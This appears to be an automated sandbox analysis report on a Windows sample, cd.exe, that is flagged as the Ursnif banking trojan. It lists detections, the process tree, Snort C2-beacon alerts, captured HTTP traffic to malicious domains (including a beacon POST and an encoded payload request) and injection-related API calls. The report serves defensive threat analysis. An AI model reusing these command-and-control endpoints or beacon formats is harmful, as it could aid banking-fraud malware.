Windows Analysis Report cd.exe

Overview

General Information

Sample Name: cd.exe
Analysis ID: 483177
MD5: cd02e745a08dd29cb6fda1761b2f4b6e
SHA1: 1a0dd3348bb0f856fff51f7e22364b0974fa1ad3
SHA256: a4ff2e7dd35e8f7362739c3a578563458548ed5ffb30abe5ec6bf6f2c0de8eb7
Tags: exe

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Detected unpacking (overwrites its own PE header)
Yara detected Ursnif
Detected unpacking (changes PE section rights)
Writes or reads registry keys via WMI
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Found PSEXEC tool (often used for remote process execution)
Writes registry values via WMI
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Yara detected PsExec sysinternal tool
IP address seen in connection with other malware
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
PE file contains more sections than normal
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • cd.exe (PID: 6888 cmdline: 'C:\Users\user\Desktop\cd.exe' MD5: CD02E745A08DD29CB6FDA1761B2F4B6E)
  • iexplore.exe (PID: 4568 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 160 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4568 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
cd.exe | JoeSecurity_PsExec | Yara detected PsExec sysinternal tool | Joe Security |

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000003.408326958.0000000003138000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000001.00000003.408240054.0000000003138000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000001.00000003.407536237.0000000003138000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000001.00000002.429559902.0000000003138000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000001.00000003.408480874.0000000003138000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |

              Sigma Overview

              No Sigma rule has matched

              Jbx Signature Overview

              AV Detection:

              Multi AV Scanner detection for submitted file
              Source: cd.exe, ReversingLabs: Detection: 60%
              Machine Learning detection for sample
              Source: cd.exe, Joe Sandbox ML: detected
              Source: 1.2.cd.exe.400000.0.unpack, Avira: Label: TR/Crypt.XPACK.Gen8
              Source: 1.3.cd.exe.82998c.0.unpack, Avira: Label: TR/Patched.Ren.Gen

              Compliance:

              Detected unpacking (overwrites its own PE header)
              Source: C:\Users\user\Desktop\cd.exe, Unpacked PE file: 1.2.cd.exe.400000.0.unpack
              Source: cd.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
              Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe, File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
              Source: unknown, HTTPS traffic detected: 173.192.101.24:443 -> 192.168.2.6:49740 version: TLS 1.2
              Source: unknown, HTTPS traffic detected: 173.192.101.24:443 -> 192.168.2.6:49739 version: TLS 1.2
              Source: unknown, HTTPS traffic detected: 173.192.101.24:443 -> 192.168.2.6:49741 version: TLS 1.2
              Source: unknown, HTTPS traffic detected: 173.192.101.24:443 -> 192.168.2.6:49742 version: TLS 1.2
              Source: unknown, HTTPS traffic detected: 168.119.139.96:443 -> 192.168.2.6:49743 version: TLS 1.2
              Source: unknown, HTTPS traffic detected: 168.119.139.96:443 -> 192.168.2.6:49744 version: TLS 1.2
              Source: unknown, HTTPS traffic detected: 142.250.102.106:443 -> 192.168.2.6:49751 version: TLS 1.2
              Source: Binary string: D:\a\1\s\Win32\Release\logonsessions.pdb source: cd.exe
              Source: Binary string: c:\stream\develop\Regionhunt.pdb source: cd.exe
              Source: Binary string: D:\a\1\s\Win32\Release\RamMap.pdb source: cd.exe
              Source: Binary string: D:\B\T\BuildResults\bin\Release\AcrobatInfo.pdb))) source: cd.exe
              Source: Binary string: D:\B\T\BuildResults\bin\Release\AcrobatInfo.pdb source: cd.exe
              Source: Binary string: D:\B\T\BuildResults\bin\Release\TextExtractor.pdb666 source: cd.exe
              Source: Binary string: C:\agent\_work\93\s\Win32\Release\autoruns.pdb source: cd.exe
              Source: Binary string: D:\a\1\s\Win32\Release\adrestore.pdb source: cd.exe
              Source: Binary string: D:\B\T\BuildResults\bin\Release\TextExtractor.pdb source: cd.exe

              Spreading:

              Found PSEXEC tool (often used for remote process execution)
              Source: cd.exe, String found in binary or memory: PsExec executes a program on a remote system, where remotely executed console

              Networking:

              Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
              Source: Traffic, Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49737 -> 173.239.8.164:80
              Source: Traffic, Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49737 -> 173.239.8.164:80
              Source: Traffic, Snort IDS: 2030821 ET MALWARE Win32/Zonebac Traffic Redirect 192.168.2.6:49737 -> 173.239.8.164:80
              Source: Joe Sandbox View, ASN Name: WEBAIR-INTERNETUS
              Source: Joe Sandbox View, JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
              Source: Yara match, File source: cd.exe, type: SAMPLE
              Source: Joe Sandbox View, IP Address: 173.192.101.24
              Source: unknown, HTTP traffic detected: POST / HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Referer: http://menehleibe.com/ | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept-Encoding: gzip, deflate | Host: menehleibe.com | Content-Length: 12 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 69 63 3d 30 26 66 62 3d 74 72 75 65 | Data Ascii: ic=0&fb=true
              Source: unknown, DNS traffic detected: queries for: menehleibe.com
              Source: global trafficHTTP traffic detected: GET /aS/feedclick?s=PmRMc57CnhYhj70e-I9ky5kfJerKhwxlfSMU3tyux_x5AGZrWUPSJmPzN2c9f2E7_vAN-6p8GpmDZG8TCuTZ6pDoEwlyap2kZsgzB4lH00ug8e5ExIzs-GByJkw_hnoLHWVUL2gXgUyatsBFMaSTc1RQ5RxkQPBqyyTn3ctXNy_0uSHRSxkmOy8VHMc85GIOT4jmse8Hco-FpMlb9RHx56VxjN2QtFN197vLrfkZ9qE509t5aRYfk0fTaZIGwGtVFx6Cjc1It8vKVodI2QoCnLeLuzBqxrSYHinyRIiR6SzTXaBf9PH6fc538M5WEvMvhjauUHGubj961r75KUjKtSXnHatHqEuiyuTMyWjRyjCKMGCurZS8_bcUa4tJgkiTyXdC5k_Q4CBuzEhgKlo_tO4ZCxjCqbxJk5Qzkw_MwwsEKwa-Bh_puw260HEYWHbHAxhhGdlJM-I_t1xxhVv3SQmb2uwb95RlGM7AqpOHVVF6EgPkt4a55MyZVnXuVkgrUl1akVOciihIlqaZoSoe2Ylzr70WFqgr6AhoabQSBzCjuJYNp4gwUYV0VWvRZajmUWO_Vxo8ML-hjUsrPH807AqUmDxuY4v8inEoo-y-qnyU06p2Uh3Pw9YdNYD58IK4CKCGcA-Uam9dcss-T-5Iub4J15H67wFZ2snzzWpWzEKC9XUORoe_dbnEgAhHx_n7Z4tVOYdW5lW6ruDPqaeHc0uzcTU9bgm_in-W2l5vorxPFmQaTFIcy4B5guOnMJ5yZHLQD576xYWbP03aM83dTwE3kMpnzCC1V5B-3hXd5pzfx17GSZUu2KHXImolykrmTazGZKmMBhE5rzai4ARXglTM7lPAlIssdjgnlOgBObVnL6dMrNPV4wycVX3s5OxtJMXedCWE2r5biNOcX3y5Pmw-0BUdBZv7MvlSTP2Fk9AaabOem2Q73GpjsG_dwXVnUc2FH6zZuqWu2Dli66C-XucADfX2tBPlR3prQOfp40mttv00_iCR6q6fLI9QZgGY11WgfO3qdEgV2xwoj0eGTIxBicwTEMicE9X3AYQsCpAEn3pdnGSoQpHTA7Kz9fo94mKnTULy2teQgTesP9hhxLreOeHrbCzwHSSbH-FJZx15JZAYCxI8gV6bvS4IWlDg_vysGgTqrjiFCjhA5kocz54NYxtQVvyXSZspRWMKjI1QYN8ennj2JVFvWfYyzeLbGr1ovqBCtNBvJi2ztcTgBlsW0SM8XIsRgd4QMcWZcycyUPzb9Wd1bDxFTAWmSXH43ynD5UObBi5FyNDw8qKKmoCnfedHiztWYQxKotKUGaKd1m_k2iMIc5SBU1Vi7-MGW4_Mi4WYIzJL61eBLaioPhng2BQ6PDt8aAWdDMho29RkRFHVPIQb3W3nWMGo8srLOHYnfrFRuEDgcm6cqkr2IQD0T7sB-GexA77NdWEi2cdlkkLEB146pQ HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Referer: http://menehleibe.com/Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: mybetterdl.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /adServe/domainClick?ai=qR193HoKV_skvRDJ1Xl7Z2EMSqLSlBmindZv5NojCHOwn03uCMUnWWP1f_rG7YbjKg1peh-_obzBIj3uZHPpnj9EVoFzCvr6nUsZVZhWVPP-29LJmEHdmZ7b6Qy9a1mHTiLNxNNj-331YCaynPT02WREUdU8hBvdAVtzW-BnG_JiVnQIGgxQDiU7ugF2M-yuSZspRWMKjI0oZaL4_NY6BA8B78vhYDGtjMUdyxHqWTbxnarhY6PRQCoyupr1mhPBjhdEqJB6Nj2XmDvYXWw9hp-qFZn5gpnPqtE9sbJicJwX2fEbVjxB9kp2QAzznS8_6fjhgUFt3sQISiZ3D8mF7LCm2HeI0S938_gGwpSXr3tSAMcY_H2x07HFovOGSDpNKiXhLmiyflhHQ2DhJtv57Pgpt-TBvcxCEwrLEAaOW_go6oM85zEqQcFJgSFbjHo8VjLddbnKrYw&ui=PmRMc57CnhbNSfHhL5kCGmvi5v6ZZrF7dLiTNq3P25qokS0sVeF3FkXI0PDyooqap4CS6zytrLbvtEDBZZLJWA-odODn3W3LTPqV0hvm1VqP--qZkGGf_8AXd3hExnhV&si=1&oref=a606ca39dc85b39bdaa2bf88832fa198&optunit=SZspRWMKjI3Y6yHw-JV9WQ&rb=mhdAWEBiphk&rr=1&abtg=0 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Referer: http://menehleibe.com/Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateConnection: Keep-AliveHost: p226681.mybetterdl.comCookie: rhid=79630578833
              Source: global traffic, HTTP traffic detected: GET /click.php?key=qxr7sx5xq96osnrqgm1a&subid=87057224030&bid=0.025&site=413999995&source=413999995&clickid=87057224030&browser=Internet+Explorer+11&geo=CH&campaign_name=CH&device=Desktop&os=Windows+10 HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Referer: http://menehleibe.com/ | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Connection: Keep-Alive | Host: gertrk.com
              Source: global traffic, HTTP traffic detected: GET /nlp/index.php?url_bnm_redirect=http://google.com HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Referer: http://menehleibe.com/ | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Connection: Keep-Alive | Host: gertrk.com | Cookie: uclick=16bzxofy; uclickhash=16bzxofy-16bzxofy-h9-0-ci-wh-4p-268f1c
              Source: global traffic, HTTP traffic detected: GET /favicon.ico HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: gertrk.com | Connection: Keep-Alive | Cookie: uclick=16bzxofy; uclickhash=16bzxofy-16bzxofy-h9-0-ci-wh-4p-268f1c
              Source: global traffic, HTTP traffic detected: GET /?gws_rd=ssl HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Connection: Keep-Alive | Host: www.google.com
              Source: global traffic, HTTP traffic detected: GET /images/branding/googlelogo/2x/googlelogo_color_272x92dp.png HTTP/1.1 | Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5 | Referer: https://www.google.com/?gws_rd=ssl | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: www.google.com | Connection: Keep-Alive | Cookie: CONSENT=PENDING+509
              Source: global traffic, HTTP traffic detected: GET /gen_204?ei=rKtAYY2rHY25kwWZrp3YAw&vet=10ahUKEwiNsaLc0P7yAhWN3KQKHRlXBzsQhJAHCBQ..s&gl=GB&pc=SEARCH_HOMEPAGE&isMobile=false HTTP/1.1 | Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5 | Referer: https://www.google.com/?gws_rd=ssl | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: www.google.com | Connection: Keep-Alive | Cookie: CONSENT=PENDING+509
              Source: global traffic, HTTP traffic detected: GET /images/searchbox/desktop_searchbox_sprites318_hr.png HTTP/1.1 | Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5 | Referer: https://www.google.com/?gws_rd=ssl | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: www.google.com | Connection: Keep-Alive | Cookie: CONSENT=PENDING+509
              Source: global traffic, HTTP traffic detected: GET /images/bjM3gVEtKlUeWm2NnKw3/UycpbcugJuZhqNGVGh8/kwk4esZ_2F2xjDYD_2BSa_/2F328cjxY6AQM/kA5SneVc/JKL1AVTBXoV77D1JaKVgbri/d8lSYHOR5C/_2FOPoUzuMMso_2Bp/A_2Ffbx4wppa/aSm6IWIjM6R/Y44GbYY.avi HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: menehleibe.com | Connection: Keep-Alive
              Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: menehleibe.com | Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateConnection: Keep-AliveHost: www.google.com
              Source: unknownHTTPS traffic detected: 173.192.101.24:443 -> 192.168.2.6:49740 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 173.192.101.24:443 -> 192.168.2.6:49739 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 173.192.101.24:443 -> 192.168.2.6:49741 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 173.192.101.24:443 -> 192.168.2.6:49742 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 168.119.139.96:443 -> 192.168.2.6:49743 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 168.119.139.96:443 -> 192.168.2.6:49744 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.102.106:443 -> 192.168.2.6:49751 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing:

              Yara detected Ursnif
              Source: Yara match File source: Process Memory Space: cd.exe PID: 6888, type: MEMORYSTR

              E-Banking Fraud:

              Yara detected Ursnif
              Source: Yara match File source: Process Memory Space: cd.exe PID: 6888, type: MEMORYSTR

              System Summary:

              Writes or reads registry keys via WMI
              Source: C:\Users\user\Desktop\cd.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
              Source: C:\Users\user\Desktop\cd.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
              Source: C:\Users\user\Desktop\cd.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
              Writes registry values via WMI
              Source: C:\Users\user\Desktop\cd.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
              Source: C:\Users\user\Desktop\cd.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
              Source: C:\Users\user\Desktop\cd.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
              Source: cd.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
              Source: C:\Users\user\Desktop\cd.exe Code function: 1_2_0040323C
              Source: C:\Users\user\Desktop\cd.exe Code function: 1_2_00401873 GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,NtGetContextThread,NtGetContextThread,LdrInitializeThunk
              Source: C:\Users\user\Desktop\cd.exe Code function: 1_2_0040171A NtMapViewOfSection,RtlNtStatusToDosError
              Source: C:\Users\user\Desktop\cd.exe Code function: 1_2_0040202A NtCreateSection,memset,RtlNtStatusToDosError,ZwClose
              Source: C:\Users\user\Desktop\cd.exe Code function: 1_2_004022D1 memcpy,memcpy,memcpy,NtUnmapViewOfSection,RtlNtStatusToDosError,FindCloseChangeNotification,memset
              Source: C:\Users\user\Desktop\cd.exe Code function: 1_2_004020E9 LdrLoadDll,LdrGetProcedureAddress,NtProtectVirtualMemory,LdrInitializeThunk,GetModuleHandleA,LdrInitializeThunk,memcpy
              Source: C:\Users\user\Desktop\cd.exe Code function: 1_2_00402F98 memset,memcpy,NtSetContextThread,LdrInitializeThunk,RtlNtStatusToDosError,GetCalendarWeekNumber,GetLastError
              Source: C:\Users\user\Desktop\cd.exe Code function: 1_2_00401646 NtGetContextThread,LdrInitializeThunk,RtlNtStatusToDosError
              Source: C:\Users\user\Desktop\cd.exe Code function: 1_2_00402550 NtUnmapViewOfSection,RtlNtStatusToDosError,FindCloseChangeNotification,memset,LdrInitializeThunk,LdrInitializeThunk,memcpy
              Source: C:\Users\user\Desktop\cd.exe Code function: 1_2_0040345D NtQueryVirtualMemory
              Source: C:\Users\user\Desktop\cd.exe Code function: 1_2_004018E5 NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError
              Source: C:\Users\user\Desktop\cd.exe Code function: 1_2_004031F0 NtGetContextThread
              Source: C:\Users\user\Desktop\cd.exe Code function: 1_2_004012A3 NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError
              Source: cd.exeBinary or memory string: zD%s\service_log.txtERROR! %s %s : %s%s\StringFileInfo\040904b0\OriginalFilename\installpath_SkipServiceVerificationChecks%s\bin\service_minimum_versions.vdf%s\service_minimum_versions.vdfVersion file missing or corrupt: %s vs cd.exe
              Source: cd.exeBinary or memory string: M\VarFileInfo\Translation\D:\B\T\Imports\Open\Chrome\Chrome\src\base\file_version_info_win.ccCompanyNameCompanyShortNameInternalNameProductNameProductShortNameProductVersionFileDescriptionFileVersionOriginalFilenameSpecialBuild\StringFileInfo\%04x%04x\%ls vs cd.exe
              Source: cd.exe Static PE information: Number of sections : 71 > 10
              Source: cd.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: cd.exe ReversingLabs: Detection: 60%
              Source: C:\Users\user\Desktop\cd.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: unknown Process created: C:\Users\user\Desktop\cd.exe 'C:\Users\user\Desktop\cd.exe'
              Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
              Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4568 CREDAT:17410 /prefetch:2
              Source: C:\Users\user\Desktop\cd.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
              Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{F14FAF2F-15AF-11EC-90E5-ECF4BB2D2496}.dat
              Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\~DF1C6E09CA4CF5EBDD.TMP
              Source: cd.exeBinary string: NUnknownDefaultNtCreateFileNtOpenFileNtQueryAttributesFileNtQueryFullAttributesFileCreateNamedPipeWNtOpenThreadNtOpenProcessNtOpenProcessTokenNtOpenProcessTokenExCreateProcessWNtCreateKeyNtOpenKeyCreateThreadNtCreateSectioncompute-only-brokercompute-only-rendereripc-co-channelipc-rdr-channeltyperenderershell-broker-channelipc-cef-channellocaleservice-sandbox-typenonenone_and_elevatednetworkppapiutilitycdmprint_compositoraudiosharing_servicespeech_recognitionvideo_capturepdf_conversionproxy_resolverxr_compositingallow-no-sandbox-joballow-sandbox-debuggingdisable-gpu-sandboxdisable-namespace-sandboxdisable-seccomp-filter-sandboxdisable-setuid-sandboxdisable-win32k-lockdownenable-audio-service-sandboxgpu-sandbox-allow-sysv-shmgpu-sandbox-failures-fatalno-sandboxallow-third-party-modulesadd-gpu-appcontainer-capsno-sandbox-and-elevatedadd-xr-appcontainer-capsgpu-processnacl-brokernacl-loaderppapi-brokerppapiutilityservicezygotentdll.dll\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\@
              Source: cd.exeBinary string: A\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\ControlH1`@dI0nIPdI\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\SystemTopicsSysItemsSystemFormatsCF_TEXTStatusReadyHelpYou are connected to Adobe Acrobat.ReturnMessage 2`@dI0nI 7Hp2`
              Source: cd.exeBinary string: GCreateEvent: STATUS_ACCESS_DENIEDD:\B\T\Imports\Open\Chrome\Chrome\src\sandbox\win\src\sync_dispatcher.ccOpenEvent: STATUS_ACCESS_DENIEDConsider modifying policy using these policy rules: EVENTS_ALLOW_ANY\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\
              Source: cd.exeBinary string: H\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\IsWow64Process2SetDefaultDllDirectoriesSetProcessMitigationPolicy\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\NtSetInformationProcesssecurity descriptor - error:D:\B\T\Imports\Open\Chrome\Chrome\src\sandbox\win\src\target_process.ccCreateProcessAsUserW failed to create sandbox process - error:job object - error:set thread token - error:g_shared_sectiong_shared_IPC_sizeg_shared_policy_size\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\ F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F]#B
              Source: cd.exeBinary string: >`\Device\FileInfo%s%s%c:Superfetchinfo: %x Data: %x
              Source: cd.exeBinary string: 3`@gI84`pfI\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\
              Source: cd.exeBinary string: cCZECSYGREELLSUOFINPOLPLKRUMROMTURTRKMNGMONESPESN\Locale\\brdlang32.Software\Adobe\Adobe Acrobat\DC\Language\current\brdlang32SYSTEM\CurrentControlSet\Control\FileSystemLongPathsEnabled\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\`
              Source: cd.exeBinary string: cnullbooleanintegerdoublestringbinarydictionarylist\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\
              Source: cd.exeBinary string: :Zone.Identifierfeatmonitorapp.exeIPTip_Main_WindowSoftware\Classes\CLSID\{054AAE20-4BEA-4347-8A35-64A533254A9D}\LocalServer32%CommonProgramFiles%CommonProgramW6432Software\Adobe\Adobe Acrobat\DC\AVGeneralbProtectedModebHasAcrobatConsentDCSoftware\Adobe\Acrobat Reader\DC\PrivilegedContinuous.lnk\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\SeChangeNotifyPrivilegeS:(ML;;;;;)S-1-16-16384S-1-16-12288S-1-16-8192S-1-16-6144S-1-16-4096S-1-16-2048S-1-16-0NtCreateLowBoxToken\Sessions\%d\AppContainerNamedObjects\%lsNtCreateDirectoryObject\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\ F] F] F] F] F] F] F] F] F] F] F] F] F] F] F]0
              Source: cd.exeBinary string: IDocOpenDocPrintFilePrintFilePrintExFilePrintSilentFilePrintSilentExFilePrintToFilePrintToExFileTrustedPrintToExFileTrustedPrintSilentExFileTrustedPrintExFileOpenUntitledFileOpenFileOpenExFileOpenMinimizedFileTrustedOpenMinimizedFileTrustedOpenExFileOpenWithParamsFileTrustedOpenWithParamsDocOpenDocPrintFilePrintFilePrintExFilePrintSilentFilePrintSilentExFilePrintToFilePrintToExFileTrustedPrintToExFileTrustedPrintSilentExFileTrustedPrintExFileOpenUntitledFileOpenFileOpenExFileOpenMinimizedFileTrustedOpenMinimizedFileTrustedOpenExFileOpenWithParamsFileTrustedOpenWithParamsHandleAcroURLAcroCEF\RdrCEF.exeAcroCEF\AcroCEF.exeRdrCEF.exeAcroCEF.exe\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\list too longatlTraceGeneralatlTraceCOMatlTraceQIatlTraceRegistrar_pptExport.emfatlTraceRefcountatlTraceWindowingatlTraceControlsatlTraceHostingatlTraceDBClientatlTraceDBProvideratlTraceSnapinatlTraceNotImplatlTraceAllocationatlTraceException.tmp.pdfatlTraceTimeatlTraceCacheatlTraceStencilatlTraceStringatlTraceMapatlTraceUtilatlTraceSecurityatlTraceSyncatlTraceISAPICount
              Source: cd.exeBinary string: Software\Microsoft\Windows\CurrentVersion\Policies\SystemEnableLUA/RegisterFileTypesOwnership /PRODUCT:Reader /VERSION:12.0 /FixPDF 3305580Click on 'Change' to select default PDF handler.pdf Properties#32770Click on 'Change' to select default PDF handler Properties#32770Click on 'Change' to select default PDF handler#32770/\ADelRCP.exeClick on 'Change' to select default PDF handler.pdfpropertiesShowAppPickerForPDF.exeProgram ManagerPROGMANClick on 'Change' to select default PDF handler.pdf Properties#32770Click on 'Change' to select default PDF handler Properties#32770Click on 'Change' to select default PDF 